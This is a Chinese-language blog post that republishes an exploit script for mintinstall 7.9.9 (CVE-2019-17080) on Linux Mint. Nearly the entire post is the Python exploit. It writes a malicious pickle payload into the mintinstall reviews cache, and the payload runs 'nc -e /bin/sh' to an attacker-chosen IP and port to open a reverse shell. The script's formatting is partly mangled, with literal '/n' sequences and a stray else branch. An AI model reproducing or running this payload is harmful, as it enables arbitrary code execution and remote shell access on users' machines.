mintinstall7.9.9代码执行漏洞利用EXP

作者:小俊 分类: WEB漏洞大全 发布于:2020-2-27 14:52 ė181次浏览 60条评论

Exp:

# Exploit Title: mintinstall (aka Software Manager) object injection # Date: 10/02/2019 # Exploit Author: Andhrimnirr # Vendor Homepage: https://www.linuxmint.com/ # Software Link: mintinstall (aka Software Manager) # Version: 7.9.9 # Tested on: Linux Mint # CVE : CVE-2019-17080 import os import sys def shellCode(payload): with open(f"{os.getenv('HOME')}/.cache/mintinstall/reviews.cache","w") as wb: wb.write(payload) print("[+] Start mintinstall") if __name__=="__main__": shellCode(f"""cos/nsystem/n(S"nc -e /bin/sh {sys.argv[1]} {sys.argv[2]}"/ntR.""") else: print("[!] exploit.py [IP] [PORT]")

本文出自 小俊博客,转载时请注明出处及相应链接。

0

发表评论

电子邮件地址不会被公开。必填项已用*标注


Ɣ回顶部